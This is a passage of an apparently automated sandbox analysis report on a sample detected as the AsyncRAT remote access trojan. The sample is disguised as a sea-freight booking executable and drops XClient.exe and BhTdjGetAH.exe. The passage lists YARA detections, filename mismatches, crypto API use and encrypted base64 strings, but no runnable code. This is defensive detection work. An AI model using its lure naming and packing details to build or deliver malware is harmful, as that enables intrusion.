Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74F37	32_2_04A74F37
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74F48	32_2_04A74F48
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A761E8	32_2_04A761E8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A761D8	32_2_04A761D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A76AB0	32_2_04A76AB0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A76AC0	32_2_04A76AC0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A7BA58	32_2_04A7BA58
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74B10	32_2_04A74B10
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 35_2_011C1958	35_2_011C1958

Sample file is different than original file name gathered from version info

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1765774652.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClientZZ.exe4 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1780627399.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1772786286.0000000005810000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1768583328.00000000040AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4215493067.0000000005E39000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Binary or memory string: OriginalFilenamepnKa.exe0 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Uses 32bit PE files

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BhTdjGetAH.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XClient.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
